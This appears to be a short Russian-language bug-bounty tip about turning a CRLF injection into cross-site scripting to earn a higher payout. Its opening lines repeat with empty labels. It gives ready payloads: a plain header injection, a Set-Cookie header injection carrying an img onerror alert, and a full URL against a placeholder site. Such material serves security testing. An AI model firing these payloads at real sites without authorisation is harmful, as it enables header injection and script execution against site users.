📄 Повышаем CRLF до XSS
Если во время тестирования веб-сайта вы нашли CRLF инъекцию, то всегда следует пробовать повысить ее до XSS и получить награду выше.
CRLF:
XSS + CRLF:
URL:
Если во время тестирования веб-сайта вы нашли CRLF инъекцию, то всегда следует пробовать повысить ее до XSS и получить награду выше.
CRLF:
/%0AHeader:header
XSS + CRLF:
/%0ASet-Cookie:"><img src=x onerror=alert(1)>
URL:
https://website.com/%0ASet-Cookie:"><img src=x onerror=alert(1)>